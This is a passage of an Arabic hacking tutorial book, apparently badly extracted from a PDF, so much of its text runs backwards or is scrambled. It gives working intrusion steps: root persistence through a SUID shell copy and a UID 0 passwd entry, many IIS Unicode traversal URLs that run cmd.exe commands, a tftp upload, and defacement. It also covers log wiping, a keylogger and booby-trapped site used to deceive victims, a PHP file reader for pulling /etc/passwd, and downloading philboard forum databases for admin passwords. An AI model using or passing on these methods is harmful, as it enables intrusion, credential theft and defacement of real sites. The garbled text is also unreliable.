seconds10 this will take about .. Sending code: 5 STEP . to leave shell\^Press

2000 EST :39 :077 21Tue Mar 1 #.0 5-.14.22net .za.box_Linux lameunknown686 i

ftp(50=groups) ftp(50=egid) root(0=gid) root(0=uid( You have root! Bang!

:طیب كیفیة تشغیل الملف عن طريق عمل كمبايل للملف باالمر

o smtp–c .gcc smtp smtp./

طبعا لكل اكسبلويت ممكن يختلف عن اخر في عمل كومبايل كیفیة معرفة امر الكومبايل

/.smtpباالمر ستظھر كافة المعلومات التي ستاحتاجھا لرفع الملف وعمل كومبايل له

دلوقتي عايزيت نعرف وضعنا على السیرفر whoami$عن طريق االمر

Root

وضعنا طلع رووت يعني مدير النظام وممكن نتحكم في السیبرفبر زي مااحنا عاوزيت وممكن تمسح الصفحة االساسیة

284

وندخل تاني ھنحتاج نعمل الخطوات اللى فاتت exitولكن ممكن لو عملت بس فیه طريقة تانیه تديني شیل اكاونت على السیرفیر ده

root وعمل له صالحیات User اضافة عن طريق sh/binاول نسخ ملف

بكتابة nul/dev/sh /bin/Cp

لن يشعر االدمین بنسخ الملف لوجود ملفات بھذا االسم بعد كده نكتب

dev/Cd Chown root nul

4775وھي suid ونعطیله صالحیات عن طريق االمر

nul4775Chmod

user:كیفیة اضافة

viمل محرر النصوص استعpasswd/etc/Vi

دلوقتي دخلنا الى ملف باسور النظام والملف بیكون بالشكل دهshell:startdir:gid:uid:password:User

gid = 0 و uidيكون super userفي حالة ھنضیف السطر ده

sh/bin:/:mega::00::Mega

طبعا انت كده روووووووووووووووووووت

موضوع ازالة اثار دخولك للسیرفر عن طريق مسح ھذه الملفات االھم في ال/lastlog/log/Var /lastlog/adm/Usr /lastlog/adm/Var

lledومحھا عن طريق االمر لرفع االكسبلويت او اي اداة ftp لمن يستخدمون wtedاو باالمر

285

طبعا دي اساسیات مش اكتر

286

)الجزء الثاني(اختراق المواقع Mega Egypt:كاتبلل

التي تعمل تحت انظمة IISاالن ساتطرق الى شرح كیفیة اختراق سیرفرات Windows وھي ثغرات الیونیكود Unicode

وسوف نتحدث عنھا قلیال وھذه الثغرة 2001 مايو سنة 15 في NSFOCUS بواسطة اكتشفت الیونیكود

Windows وتعمل تحت انظمة 5IIS & .0 4IIS 0.تكون موجوده في سیرفرات ھذه الثغرة تمكن المخترق من ادخال االوامر بالقوة نظرا لصالحیته المسموح

بھا

لكني لن اتطرق الى شرحھا برمجیا نظرا لطول الموضوع وقد كتب عنھا طكثییر من قبلي

ولكني ساتحدث عن كیفیة استغالل ھذه الثغرات

ماھي ثغرا الیونیكود c/?exe.cmd/32system/winnt../c1%1c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../v9%0c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../af%0c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../qf%0c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../s8%1c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../c9%1c/..%scripts/com.xxxx.www://httpc+dir+:\ c/?exe.cmd/32system/winnt../pc%1c/..%scripts/com.xxxx.www://http

dir++ c:\ /

syst/winnt../63%35%25../..%63%35%25../..%63%35%25.%/.msadc

287

c+dir+c/?exe.cmd/32em:\ /

+c/?exe.cmd/32system/cwinnt255..%c255..%c255..%c255/..%MSADCc+dir:\ /

exe.cmd/32system/cwinnt35..%%c35..%%c35..%%c35/..%%MSADCc+dir+c/?:\ /

syst/winnt63%35..%%63%35..%%63%35..%%63%35/..%%MSADCc+dir+c/?exe.cmd/32em:\ /

63%35%25..%63%35%25..%63%35%25..%63%35%25/..%MSADCc+dir+c/?exe.cmd/32system/winnt:\ /_

cm/32system/winnt../c255..%c255..%c255..%c255..%c255/..%bin_vtic+dir+c/?exe.d:\ /_3ystems/winnt../c35..%%c35..%%c35..%%c35..%%c35/..%%bin_vtic+dir+c/?exe.cmd/2:\ /_6%35..%%63%35..%%63%35..%%63%35..%%63%35/..%%bin_vtic+dir+c/?exe.cmd/32system/winnt../3:\ /_..63%35%25..%63%35%25..%63%35%25..%63%35%25/..%bin_vtic+dir+c/?exe.cmd/32system/winnt../63%35%25%:\ /c+dir+c/?exe.cmd/32system/tcwinn255..%c255..%c255/..%PBServer:\ /

dir+c/?exe.cmd/32system/cwinnt35..%%c35..%%c35/..%%PBServerc+:\ /.cmd/32system/winnt63%35..%%63%35..%%63%35/..%%PBServerc+dir+c/?exe:\ /

288

3system/winnt63%35%25..%63%35%25..%63%35%25/..%PBServerc+dir+c/?exe.cmd/2:\ /c+dir+c/?exe.cmd/32system/cwinnt255..%c255.%.c255/..%Rpc:\ /c+dir+c/?exe.cmd/32system/cwinnt35..%%c35..%%c35/..%%Rpc:\ //?exe.cmd/32system/winnt63%35..%%63%35..%%63%35/..%%Rpcc+dir+c:\ /

cm/32system/winnt63%35%25..%63%35%25..%63%35%25/..%Rpcc+dir+c/?exe.d:\ /_

cm/32system/winnt../c255..%c255..%c255..%c255..%c255.%/.bin_vtic+dir+c/?exe.d:\ /_3system/winnt../c35..%%c35..%%c35..%%c35..%%c35/..%%bin_vtic+dir+c/?exe.cmd/2:\ /_6%35..%%63%35..%%63%35..%%63%35..%%63%35/..%%bin_vtic+dir+c/?exe.cmd/32system/winnt../3:\ /_..63%35%25..%63%35%25..%63%35%25..%63%35%25.%/.bin_vtic+dir+c/?exe.cmd/32system/winnt../63%35%25%:\ /

syste/cwinnt255..%c255..%c255..%c255..%c255..%c255/..%samplesc+dir+c/?exe.cmd/32m:\ /-cgi/32system/cwinnt255..%c255..%c255..%c255..%c255..%c255/..%binc+dir+c/?exe.cmd:\ /

syste/fwinnt252..%f252..%f252..%f252..%f252..%f252/..%iisadmpwdc+dir+c/?exe.cmd/32m:\ /_

system/cwinnt255..%c255..%c255..%c255..%c255..%c255/..%cnf_vtic+dir+c/?exe.cmd/32:\

289

/sys/cwinnt255..%c255..%c255..%c255..%c255..%c255/..%adsamples

c+dir+c/?exe.cmd/32tem:\ /

cm/32system/Cwinnt1%1C..%C1%1C..%C1%1C..%C1%1C/..%scriptsc+dir+c/?exe.d:\ /


cm/32system/AFwinnt%0C..%AF%0C..%AF%0C..%AF%0C/..%scriptsc+dir+c/?exe.d:\ /

di+c/?exe.cmd/32system/fwinnt252..%f252..%f252..%f252/..%scriptsc+r:\ /c+dir+c/?exe.cmd/32system/cwinnt255..%c255/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../c1%1c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../v9%0c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../af%0c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../qf%0c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../s8%1c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../c9%1c/..%scripts:\ /c+dir+c/?exe.cmd/32system/winnt../pc%1c/..%scripts:\ //?exe.cmd/32system/winnt../af%0c/..%..af%0c../..%af%0c/..%msadcc+dir+c:\ /_/?exe.cmd/32system/winnt../af%0c../..%af%0c../..%af%0c/..%bin_vtic+dir+c:\

باسم الموقع المرا اختراقه xxxيتم ذلك باستبدال طبعا دي مش كل الثغرات انما جزء بسیط جدا م غلقھا يخرج بدل منھا مئاتفثغرات الیونیكود ال يمكن حصرھا وكل ثغرة يت

290

exe.cmd عن طريق برنامج Explorerيتم تنفیذ االومر عن طريق المتصفح

indexواالن ساتحدث عن بعض االوامر التي ستحتاجھا لتغییر

قراءة ملف bin_vti_/com.xxxx.www://http

%../htm.ndexi\:c+type+c/?exe.cmd/32system/winnt../af%0c../..%af%0c

حذف ملف

bin_vti_/com.xxxx.www://http %../ww\inetpub\:c+md+c/?exe.cmd/32system/winnt../af%0c../..%af%0casp.index\wroot

الكتابة في ملف

bin_vti_/com.xxxx.www://http %../

xxxxxxxxxxx+echo+c/?exe.cmd/32system/winnt../af%0c../..%af%0c+<+txt.xx\:c یر اسم ملفلتغbin_vti_/com.xxxx.www://http

%../htm.xxxxx\:c+ren+c/?exe.cmd/32system/winnt../af%0c../..%af%0c

نسخ ملف bin_vti_/com.xxxx.www://http

%../

291

syste\winnt\:c+copy+c/?exe.cmd/32system/winnt../af%0c../..%af%0cexe.DJ\scripts\inetpub\:c+exe.cmd\32m

Folderشاء ان

bin_vti_/com.xxxx.www://http %../xxxx\:c+md+c/?exe.cmd/32system/winnt../af%0c../..%af%0c

Folderحذف bin_vti_/com.xxxx.www://http

%../xxx\:c+rd+c/?exe.cmd/32system/winnt../af%0c../..%af%0c االن وھو االھم

Indexكیفیه تغییر الصفحة الرئیسیة ھا طريقتینل

رفع ملف الى الموقع -1 الكتابة داخل الضفحة االساسیة للموقع -2

شرح الطريقة االولى

tFTP ولیكن FTPوستكون بواسطة اي برنامج

cقم بتنصیب البرنامج في cقم بوضح الصفحة المراد رفعھا في

ونفذ االمر االتيbin_vti_/com.xxxx.www://http

%../-+"exe.tftp+c/?exe.cmd/32system/inntw../af%0c../..%af%0chtm.index\wwwroot\inetpub\:C+htm.index+GET+.1.0.0127"+i

مع مالحظة االتي الى اي بي بتاعك0.0127. 1. تغیر -12- tFTP ھو البرنامج لخاص برفع الملف ويمكن تغیره حسب البرناج

المستخدم

292

شرح الطريقة الثانیة

مستخدما االمر script الى مجلد exe .cdmوستكون بنسخ ملف

bin_vti_/com.xxxx.www://http %../syste\winnt\:c+copy+c/?exe.cmd/32system/winnt../af0%c../..%af0%c

exe.xx\scripts\inetpub\:c+exe.cmd\32m

وبعد ذلك يمكنك رؤية الموقع من ھذه الثغرة c+dir+c/exe.xx/scripts/com.xxx.www://http:\

بھذه الطريقة echoواالن نفذ االمر + <xxxxx + echo+c/?exe.1CMD/scripts/com.xxx.www://http

htm.2\mega\:c

انا كده انتھیت بس لسه حاجة مھمة جدااااااااااااااااااااااا وھي مسح االثر النتبقي من اختراقك عن طريق االمر

bin_vti_/com.xxxx.www://http ./%.

system/winnt:/c+del+c/?exe.cmd/32system/winnt../af%0c../..%af%0clog/*.logfiles/32

IISده تقريبا ما يمكنني التحدث عنه بشان سیرفرات

واتمنى ان يحوز رضاكم

293

اختراق موقع مجاني



بتعلیمكم كیف تقومون بسرقة موقع مجاني في ھذا الدرس سوف اقوم عضو في منتدى وإلى آخره من اھتمامات الضحیة+ أوسرقة بريد

ألحین لن نلجأ إلى استعمال الثغرات مثل الیونیكود والبحث عن ثغرات أباتشي

او ثغرات المیكروسوفت

بل يمتاز ھذا الدرس بالسھولة

: أي موقع مجانيأول شي الزم أعلمكم األساسیات في اختراق معرفة إصدار المتصفح-1 معرفة بیانات صاحب الموقع مثل إيمیل ماسنجر أو يتوفر لديه سجل زوار-2 برنامج إلغام المواقع+ برنامج سرقة كل ماكتبه الضحیة من باسوورد -3

)========الشرح========( كیف تعرفه ھذا من أبسط العملیات التي سوف تقوم بھا-1

أسفل الموقع راح تجد يفضل تصفحة بدقة معینة وحلوھا الزم تالقي إبحث في )المتصفح اللي يستخدمه الموقع(إصدار اإلكسبلورر

ھذا عاد علیك أنا مالي شغل إنت المفروض تعرفه وتجیبه بنفسك-2 سوف نتطرق إلیھا في األسفل-3

-- -- --- -- --- -- -- -- --- -- -- --- -- --- -- -- -- --- -- -- ---

خدع الضحیة وتجبره على فتح الموقع الملغوم اللي لو فتحه راح كیف ت+=+ +=+يتحمل الملف التجسسي في جھازه وتتملكه بالكامل

294

)ھذي اصعب نقطة في الدرس(

لكن إنشاء اهللا أستطیع تقريب الفكرة لديكم

ناخذ مثال على com.freeservers.www://http

یش؟تحدد نوعیة الشركة للموقع وتذھب إلیه ل

عشان تسجل فیه ويرسلون لك البیانات وعاد إنت ألحین عندك التصمیم حق

)الضحیة(البیانات للموقع اللي سجل فیه نفسه

><>الفكرة ومافیھا تخلي الضحیة يفتح موقعك<><

له عشان يفتح موقعك FreeServersوألحین ترسله الرسالة اللي أرسلوھا لك الملغوم

كیف تلعب علیه طیب لو ماعنده إيمیل

بسیطة فیه شي اسمه سجل الزوار روح عنده واكتب له

)))إلعب علیه(((تفضل وشوف ھذا الموقع ھذا نفس تصمیمك ونفس كل شي

اآلن سوف نعتمد على برنامج خطیر جدا وقوي وال يكشفه إصدارات النورتورن

2001القديمة ماقبل

من باسوورد وكل مالديهتسجیل كل ماكتبه الضحیة /وظیفة البرنامج exe.pro2000kk/com.mikkotech.www://http/وصلة البرنامج 9C4A876E793218-0-109-43-100K: SN-29/السیريال نمبر

برنامج في غاية القوة والبساطة

التحكم قبل أن تجرب<<<

295

اآلن انتھینا من تحمیل برنامج التجسس

لم يبقى سوى برنامج لتلغیم المواقع

odwillgھذه ((5.5 و 5وھو البرنامج الخاص اللغام الموقع على انترنت اكسبلور

ووصلته ))ھي سر المھنه

zip.gwpackage/activex/org.thecorpz.www://http

واللي يبغى الشرح التوضیحي يروح الشرح ھذا

2=forumid?php.forumdisplay/vb/com.nicmatic.arabteam

+مجة الفريق العربي للبر+ =-= -=-= -=-= -=-=-= -=-= -=-= -=-=-= -=-= -=-= -=-=-= -=-= -=

والحین وبعد ماخلصنا من وضع الصفحة الملغومة

نخلي الضحیة تفتحھا بالطرق اللي ذكرتھا =-= -=-= -=-= -=-=-= -=-= -=-= -=-=-= -=-= -=-= -=-=-= -=-= -= ][?][وبعد أن تفتح الضحیة موقعك الملغوم مھمتك تصبح االنتظار][?][

296

FrontPage Extension

DeXXa . ( L.O. T(:للكاتب

: ما الذي يجب أن تعرفه قبل قراءة ھذا الدرس

. باالنجلیزية االلمام * . كیفیة اختراقه و لیس FrontPage Server Extensions قراءة المزيد عن الـ * Microsoft Office FrontPage .كیفیة التعامل مع برنامج * CHMOD .یفیة التعامل مع الـك * Telnet .كیفیة التعامل مع الـ * HTTP .كیفیة التعامل مع بروتوكول * SQL .البیانات العالئقیة كیفیة التعامل مع قواعد * Server Side بناحیة الخادم كیفیة التعامل مع أحد لغات الويب و التي تعمل *. Scripting Language

بأني اؤمن بأن المخترق ما ھو إال انسان وظیفته البرمجة و ادارة و و اذكر أخیرا الشبكات و لیس انسان ھمه ھو معرفة القلیل تحلیل النظم و

و العبث بما تعب به اآلخرون و تضییع من األمور التي تساعده في التخريب لذا فافترض بأن الوقت في الدردشة و التسكع بمقاھي االنترنت ، و

Screen Capture .ه سیكون واضحا و ال يحتاج لـما أقول : خريطة الموضوع @ الموضوع ؟ ما الذي ستسفیده عند قراءة . مقدمة . ؟ FrontPage Server Extensions ما ھو الـ . ؟ FrontPage Extension Server ما ھي آلیة عمل الـ . FrontPage Extension Server االتصال بـ كیفیة . أم ال FrontPage كیفیة معرفة ھل الموقع يدعم الـ. كیفیة استغالله لیصبح في صالحك .

ما الذي ستستفیده عند قراءتك للموضوع ؟ @ FrontPage Server Extensions .ستعرف ما ھو الـ * . عمله آلیة * . كیفیة جمع المعلومات الخاصة بأي موقع * . د االتصال بالخادم الخاص بهلالستفادة منه عن بعض الطرق *

297

: مقدمة @فتجدھم تسعى شركات التسكین بأنواعھا توفیر شتى شبل الراحة لعمالئھا ،

و PHP يقدمون العروض و التخفیضات الرضاء العمالء مثل دعم لـ

CGI و Perl و SSL و FTP و. SQL

ل لھم لتصمیم البرنامج المفض فإن Webmasters و بالنسبة لمدارء المواقع مبین يأتي و الذي كما ھو Microsoft Office FrontPage مواقعھم ھو

البرمجیات ، اذ يتمیز بسھولة استعماله كما انه يوفر بعض Office مع حزمة

. مثل عداد الزوار ، و لذا تقدم شركات التسكین دعم كامل للبرنامج

؟ FrontPage Server Extensions ما ھو الـ @ سأتكلم حالیا عن الحزم التي أتت بعد حزمة االصدار الثاني: حظة مال

بشركة الخاص Server ھو عبارة عن حزمة من البرامج يتم تثبیتھا في الخادم

. التسكین التي لھا قالبیة لدعم بعض الخصائص : يجب انشاء عدة مجلدات منھا و عند التثبیت

private _/

bin _vti_/

cnf _vti_/

log _vti_/

pvt _vti_/

txt _vti_/

: و سأتكلم عن وظیفة كل مجلد يھمنا _ bin _vti :المجلد *

298

: و يتواجد بداخله مجلدان ھما _ bin _vtiالنقطتان تشیران إلى المجلد : مالحظة / adm_vti_../ / aut_vti_../

خاص بالمشرف وال تستطیع أنه ال الثاني ال يھمنا بقدر ما يھم المجلد األول اذ . االستفادة منه اذا لم تحصل على كلمة المرور الخاصة به

: كما يوجد ملفان ھما

exe .shtml../ exe .fpcount../

_ pvt _vti :المجلد * : يتواجد بداخله عدة ملفات ما يھمنا منھا ھو الملفات التالیة و و كلمة المرور الخاصة بالمشرف و فیه يتواجد المعرفpwd . service :الملف-

DES .بمقیاس مشفرة authors .و فیه يتواجد المعرفین من مشرفین وgrp . service :الملف- الملفات التي و فیه يتواجد مساراتbtr . doctodep :وbtr . deptodocملفي-

تم تحمیلھا على الخادم ، فاذا قمت بتنزيله فتستطیع معرفة الملفات . ودة بالموقعالموج

المجلد اذ يوجد في المجلد الرئیسي و في الغالب ال تستطیع معاينة محتوياتالزوار من و المجموعة و يقوم بمنع الجمیع المالك. htaccessللموقع ملف

. معاينة المجلد و محتوياتهان عدم وضع أي صالحیة على المجلدال يعني بأنھا تعتبر ثغرة و لكن : مالحظة

الناحیة عف منض _ private :المجلد *

. htaccess .ملف واحد فقط ھو و يتواجد بداخله ؟ FrontPage Extension Server ما ھي آلیة عمل الـ @

على بروتوكول FrontPage Extension Server يعتمد االتصال بین العمیل و الـ HTTP .الـ

فانه يتم ارسال FrontPage امج الـالزوار عن طريق برن فلو اردنا معاينة عداد

299

FrontPage Extension Server الخادم بالـ للخادم ثم يمرره Request طلب، و من ثم يكرر تمريره exe . fpcountالخادم مثل و الذي يمرره بالتالي ببرمجیات

إلى الخادم و يظھر المخرجات و Extension Server مرة أخرى إلى الـ . جدار نار ان ھذه االتصاالت تتم عبرلـ العمیل ، علما

FrontPage Extension Server :كیفیة االتصال بـ @فتجدھا كما ذكرنا سابقا ان أغلب شركات التسكین تسعى لراحة العمالء ،

و ذلك لتحمیل الصفحات للموقع علما بأنھا FrontPage تدعم خدمة الـ ت و انشاء المجلدات عبر المتصفحو تحمیل الملفا FTP تدعم بروتوكول الـ

. اعتمادا على البرمجیات التي تعمل بناحیة الخادم FrontPage Extension لمعرفة كیفیة االتصال بالـ و اآلن قم بتنفیذ التالي

: Server و التي ال تختلف أبدا عن الحزم XP سأتكلم حالیا عن حزمة الـ : مالحظة

الشكلیةالنقاط الباقیة إال في بعض Office .مرفقا مع حزمة و الذي يأتي FrontPage قم بتشغیل برنامج الـ * Open Web .قم باختیار File من قائمة * . ( األصلیة و لیست المشفرة( قم باضافة المعرف و كلمة المرور *صحیحة سیظھر لك الخادم ملفات الموقع كلھا و عندھا تستطیع اذا كانت *

الملفات و المجلدات و معاينة الشفرة المصدرية میل و التعديل فيالتح . للملفات

تتم العملیة بنجاح فھذا يعني بأن الموقع ال يدعم الخدمة أو أن المعرف اذا لم * المرور خاطئة و يطلب منك معاينتھا في وضعیة القراءة و ال أو كلمة

ت و الملفات التي يحويھا الموقعالمصدرية األصلیة وال المجلدا يظھر لك الشفرة.

: أم ال FrontPage كیفیة معرفة ھل الموقع يدعم الـ @ : الطرق لمعرفة قابلیة الموقع لدعم الفرونت بیج نذكر منھا يوجد العديد من

: ملف نجاح التثبیت معاينة *يدعم ھذا ال يعني أن الموقع ال و لكن_ html .inf_vtiقد ال تجد ملف: مالحظة

الخدمة ، كما أنه ال يعتبر ثغرة FrontPage قم بزيارة أي موقع تريد أن تعرف ھل الخادم الخاص به يدعم الـ-

. أم الالموقع بواسطة المتصفح و ذلك بارفاقه بعنوان_ html .inf_vtiقم بمعانیة ملف-

300

: ، مثالhtml.inf_vti_/com.Victim.www://http

FrontPage Configuration Information معاينة الصفحة ستجد جملة و عند- قد تم تثبیتھا FrontPage Extension Server الـ ، فھذا معناه أن حزمة

. في الخادم بنجاح : و لمعرفة اصدارة الخدمة قم بالتالي

Source Code .فأرة األيمن على الصفحة ، ثم قم باختیاربزر ال قم بالنقر- تشیر لالصدار الخاص Version حیثVersion=" FPVersion "عن قم بالبحث-

. بالخدمة _ cnf _vti :عن طريق مجلد * FrontPage تريد أن تعرف ھل الخادم الخاص به يدعم الـ قم بزيارة أي موقع-

. أم ال : د بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثالالمجل قم بمعانیة-

cnf_vti_/com.Victim.www://http Source Code .الفأرة األيمن على الصفحة ، ثم قم باختیار قم بالنقر بزر- : الشفرة التالیة قم بالبحث عن-

Programe :eneratorg_vti يشیر لنوع البرنامج و اصدارته و سیكون في حالتنا ھو Programe حیث-

Microsoft FrontPage X و االصدارة الخاصة به ھي. X : الكشف عن الشفرة المصدرية للصفحة * FrontPage قم بزيارة أي موقع تريد أن تعرف ھل الخادم الخاص به يدعم الـ-

. أم ال Source Code .باختیار م بالنقر بزر الفأرة األيمن على الصفحة ، ثم قمق- : عن الشفرة التالیة> Head/><Head <قم بالبحث بین ترمیزي الرأس-

> "Programe="Content" GENERATOR="Meta Name< Microsoft البرنامج و اذا كان البرنامج ھو يرمز لنوع Programe حیث- 0.FrontPage Xالخاص بالموقع يدعم الفرونت بیج و يتبین لنا بأن الخادم

X .االصدارة الخاصة به ھي NetCraft :عن طريق موقع * net . NetCraft .قم بزيارة الموقع- . http//: قم بكتابة عنوان الموقع مستثنیا الـ- . انتظر بضع ثواني- أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة د أن الموقعستج-

301

قابلیة دعمه للبرنامج ، و من تلك الخدمات في الموقع الذي تريد معرفةيرمز X حیثX /frontpage_ modبالشكل و ستظھر لك FrontPage خدمة الـ

FrontPage Extensions Server .الصدارة الـ Telnet :عن طريق الـ *الطريقة في معرفة بعض المعلومات عن الخادم و تساعد ھذه: مالحظة

السابقة المخرجات ھي نفس مخرجات الطريقة Telnet .ستظھر و اكتب بالنافذة التي Run قم باختیار Start من قائمة- : بالشكل التالي80قم باالتصال بالموقع عبر المنفذ -

Open > Microsoft Telnet/com.victim.www://http 80 Head .ھي Method للخادم و لتكن الطريقة Request قم بارسال طلب- HTTP االلمام بكیفیة التعامل مع بروتوكول علیك: مالحظة الموقع الضحیة و ھو net.victim.www://http/ قم بارسال التالي حیث-

net .ISPھو البروكسي الخاص بمزود الخدمة الخاص بك : Head /net.victim.www://http 1.1/ HTTP

net .ISP: Host

: */* Accept

close : Connection . ثوانيانتظر بضع - مثل Server عن الطلب الذي ارسلتھب للخادم Response ستستلم االجابة-

. تاريخ آخر تعديل للصفحة و نوع الملقم و الخدمات المتوفرة به

الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و ھو أن و من ضمن X /frontpage_ modستظھر لك بالشكل و FrontPage خدمة الـ

FrontPage Extensions Server .يرمز الصدارة الـ X حیث : كیفیة استغالله لیصبح في صالحك @

الـ اذا عثرت على موقع يدعم ھذه الخدمة و لم يتم وضع صالحیات على مجلدpvt _vti_قم بالتالي :

ناحیة الخادم و في حالتنا فھي الـ علیك االلمام بلغة تعمل على: مالحظة PHP ،كما أن على الموقع الضحیة دعم ھذه اللغة

302

. قم باالتصال بالموقع الضحیة * : و ضمنه التالي PHP امتداده بـ قم بتحمیل ملف ينتھي *

PHP <? ; ")r", file$(FOpen= open $ ; ))file$(FileSize, open$(FGets= get $ ; get$Echo ; open$FClose

?> محتوياته للخادم يقوم بفتح ملف غیر معین ثم يحضر PHP لفو قمنا ھنا برفع م

على حسب حجمه بالبايت ثم يعرضه ثم يغلق الملف ، و اآلن كلفعله اآلن ھو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان ما علیك

و الملف الذي تريد معاينة الشفرة file المتغیر الملف الذي حملته و : لخاصة به ، مثالالمصدرية ا

passwd/etc=/../../../file?php.file_uploded/com.victim.www://http

اضافة يشیر السم الملف الذي قمت بتحمیله ، و تستطیعfile _ uplodedحیث . سمح لك بمعاينة الملفات و المجلدات الموجودة في الخادماوامر ت

303

asp. philboardاختراق المواقع من نوع

cRaZy hAcKeR :للكاتب

كما يعرف الجمیع ان اختراق المواقع من اصعب امور االختراق لذلك فھو يتطلب

دراسة (لدراسة الثغرات واالنظمة والسیرفرات المختلفة دراسة متفحصة منك ........ الثغرات الموجودة في ھذه االنظمة ومتابعة) احتراف

وكیف نعرفھا وكیف يمكن االستفادة منھا ما ھي.. قد يسأل سائل عن الثغرات

بعد معرفتھا ؟؟ عن أخطاء برمجیة غیر مقصودة في ھذه االنظمة يستغلھا ھي عبارة: الثغرات

)ير العامالمد( االدمن الھكر للوصول الى اسم وباسوورديتطلب منك اجادة لكي تكتشف ثغرة بنفسك فان ھذا : كیف نتعرف علیھا

بعضھم والبیرل والجافا وقد يكتفي++ بعض اللغات البرمجیة كالسي والسي . وكذلك اجادة اللغة االنجلیزية في المقام األول..ويقتصر على لغة او لغتین

ا ما ذا تفعل ؟اذا لم تكن مبرمجا ويصعب علیك تعلمھ.. طیب

لتتعرف على احدث واخر الثغرات الموجودة security sites مواقع الحماية تابع

على االقل% 70فقط اجادة اللغة االنجلیزية بنسبة ويتطلب منك للبحث عن الثغرات ھامة: مصطلحات - * -

Vulnerabilities او : exploitsثغرات نستخدمھا ؟ وكیف- * -

وبجانبه اذا عرفت عن ثغرة ما واكتب البرنامج الذي به ثغرة googleاذھب الى Vulnerabilities او exploit كلمة

او ابحث عنه في مواقع السیكیورتيوستجدھا مشروحة في ھذه المواقع مع طريقة التطبیق لكن ال بد ان يكون

ن أل( سابقة عن االنظمة والسیرفرات حتى تستطیع فھم الشرح لديك خلفیةفالذي لیس لدية قاعدة معلوماتیه ) من ھكر لھكر يعتبر شرح: شرحھم للثغرة

304

. تقريبا % 30سابقة لن يستطیع الفھم اال بنسبة : مواقع الحماية التي أنصح بھا- * - /com.securityfocus.www://http /com.packetstormsecurity.www://http /com.securiteam.www://http

+++++++++++++++++++++++++++++++++++++++++++

لحة الموجودينعامة عن اھم المواضیع ولن اتعمق لمص نبذة

كثیرة جدا ولكنني سأذكر اكثر السیرفرات انتشارا بالنسبة للسیرفرات فھي : وھي نوعین

ولھا كثیر من الثغرات تسمى IIS يكروسوفت ويسمى من شركة م1- بالیونیكود

أباتشي وھو من مجموعة من المبرمجین حول apache ونوع اخر يسمى2- IIS .ثغرات منالعالم وله ثغرات ولكنھا اقل

الموجودة ايضا ھنالك ثغرات لألنظمة المركبة على تلك السیرفرات واالنظمة

: غالبا ايضا كثیرة ولكن سأذكر المشھور والمنتشر NT وويندوز server 2000الويندوز المعروفة واخص منھا ويندوز انواع 1 / اللینكس بأنواعھاانتشارا من بین االنظمة وھي عائلة الیونكس و واالكثر 2 /

أتقن التعامل مع السیرفرات ولیكن أباتشي + لینكس او يونكس اذن أتقن نظامحاول ان تتعلم احد لغات البرمجة وذلك على + طور انجلیزيتك باستمرار+

ھكر مواقع محترف= حسب االنظمة

حیث يوفر shell ويوجد بديل لمن ال يريد استخدام نظام اللینكس وھو الشیلتطبیق االوامر على السیرفرات بسھولة ومن بعد أيضا والموضوع يطول في لك

. ھذا المجاللكن الھدف ان أعطي صورة واضحة وشاملة الھم ما ينبغي ان يتعرف علیه من

. الدخول لھذا العالم اراد

305

+++++++++++++++++++++++++++++++++++++++++++ الدرس نبدأ

)asp (الدينامیكیة كر احد الثغرات في بعض اللغاتكانت ھذه مقدمة واالن سأذactive server pages

عديدة وخصوصا في التعامل مع قواعد طبعا ھذه اللغة ولألسف بھا ثغرات . بیاناتھا

لغات البرمجة الدينامیكیة التفاعلیة لبرمجة بشكل مختصر ھذه اللغة تعتبر من فيمخ مواقع االنترنت ولھا میزة بأن الكود لھا

: وتعتمد قواعد بیاناتھا على ثالثة أنواع ھي

S Access.M&& sql && sqlserver

أبسط الثغرات بحیث انك واما قاعدة بیانات ما يكروسوفت أكسس فثغراتھا منتحمیلھا على جھازك اذا وجدت امتدادا واسم قاعدة البانات فقط فانك تستطیع

. ويسر وبدون تشفیر أيضامباشرة وتصفح جمیع الباسوردات بسھولة

والیكم المثال من أحد المنتديات التي تتضح جلیه بھا ھذه الثغرة وھي باسمasp .philboard

asp.philboard/forum/uk.co.khill.www://http مثل ھذا المنتدىل ھذا النوع منتديات اذھب الى جوجل كما ذكرنا سابقا وابحث مث وطريقة ايجاد

.... وانتظر النتائج -------------- < philboardعن -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

تحمل قاعدة البیانات ؟ كیف اكتب ھذا االمتداد

واضیع حتى يكون حجم عديد قلیل من الم وبعد ذلك حاول ان يكون المنتدى به بسرعة قاعدة البیانات صغیر جدا للتطبیق والتسلیم

وھذا ھو امتداد واسم قاعدة البیانات لقاعدة البیاناتmdb.philboard/database

وتكتبه بعد اسم الموقع والمنتدى مثلmdb.philboard/database/forum/uk.co.khill.www://http

بد لكي تقرا قاعدة البیانات ان يكون في جھازك برنامج ما يكروسوفت وال

أكسس

306

قاعدة البیانات ستجد بداخلھا عدة جداول فیعا جمیع محتويات قاعدة وبعد فتح البیانات

users ضمنھا وھو المھم جدول المستخدمین ال من اسم المدير العام مع الباسوورد وھو admin تجد اول اسم عالبا ھووس

والباسوورد ماذا تبقى ؟ وبعد ان حصلنا على االسم وكأنك المشرف العام لم يبقى الى الدخول للوحة التحكم للمنتدى للتحكم فیه

asp .admin_philboardوھذا عنوانھا مثالasp.admin_philboard/forum/uk.co.khill.www://http

edit و delete وستجد كل منتدى وبجانبة كلمه ادخل

جديدة واكتب علیھا احذف كل المنتديات وأنشا منتديات

xxxxxxxxx الي يعجبك xxxxxxx الي تبي يعني اسمك بدلھا وضع

وين ؟من

من المربعین الموجودة باالسفل في لوحة التحكم اكتب في المستطیل

وفي المربع الي اسفله يعني اضافه add واضغط

307

